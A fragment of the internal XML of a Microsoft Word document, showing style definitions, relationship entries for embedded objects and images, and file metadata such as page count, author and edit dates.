      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00047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6AD"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="000476AD"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="000476AD"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="000476AD"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00047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6AD"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="000476AD"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BookTitle">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="00FE6083"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00FE6083"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B556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5643"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B556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5643"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0013621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13621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oleObject" Target="embeddings/oleObject2.bin"/><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oleObject" Target="embeddings/oleObject4.bin"/><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6.emf"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject5.bin"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject3.bin"/><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emf"/><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7.emf"/><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emf"/><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2.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B9E28E-A3C9-41C8-AA19-E7549A5FF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1519</TotalTime>
  <Pages>49</Pages>
  <Words>4147</Words>
  <Characters>23642</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>197</Lines>
  <Paragraphs>55</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>27734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 D</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>AKSHAYA D</cp:lastModifiedBy>
  <cp:revision>317</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-08T03:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-28T03:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>